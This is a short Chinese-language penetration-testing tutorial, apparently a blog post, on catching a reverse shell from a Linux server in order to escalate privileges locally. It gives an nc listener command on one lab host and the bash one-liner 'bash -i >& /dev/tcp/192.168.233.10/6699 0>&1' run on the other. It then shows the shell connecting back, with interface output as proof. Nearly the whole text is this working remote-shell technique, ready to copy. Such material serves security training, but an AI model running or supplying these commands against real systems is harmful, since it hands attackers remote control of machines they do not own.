大家在做渗透测试的时候,遇到linux的服务器,想反弹shell回来本地溢出提权,怎么办?上传反弹脚本?当然可以,简单来说就是A主机可以通过执行B主机上的命令并且把返回值都返回到A上。今天再告诉大家几种方法
环境说明:
check1:192.168.233.10 C6 2.6.32-696.30.1.el6.x86_64 本地 check2:192.168.233.20 C7 3.10.0-862.3.3.el7.x86_64 远程
BASH:
首先要在本地配置好nc工具,配置方法之前的文章有
在本地使用nc监听一个端口:
[root@wcy ~]# nc -lvv 6699
在远程机器上操作:
[root@localhost ~]# bash -i >& /dev/tcp/192.168.233.10/6699 0>&1
本地可以看到远程机器的shell已经返回到本地上面
[root@wcy ~]# nc -lvv 6699
Connection from 192.168.233.20 port 6699 [tcp/*] accepted
[root@localhost ~]# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens32: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:0c:29:6b:b8:d5 brd ff:ff:ff:ff:ff:ff
inet 192.168.233.20/24 brd 192.168.233.255 scope global noprefixroute ens32
valid_lft forever preferred_lft forever
inet6 fe80::20c:29ff:fe6b:b8d5/64 scope link
valid_lft forever preferred_lft forever
[root@localhost ~]#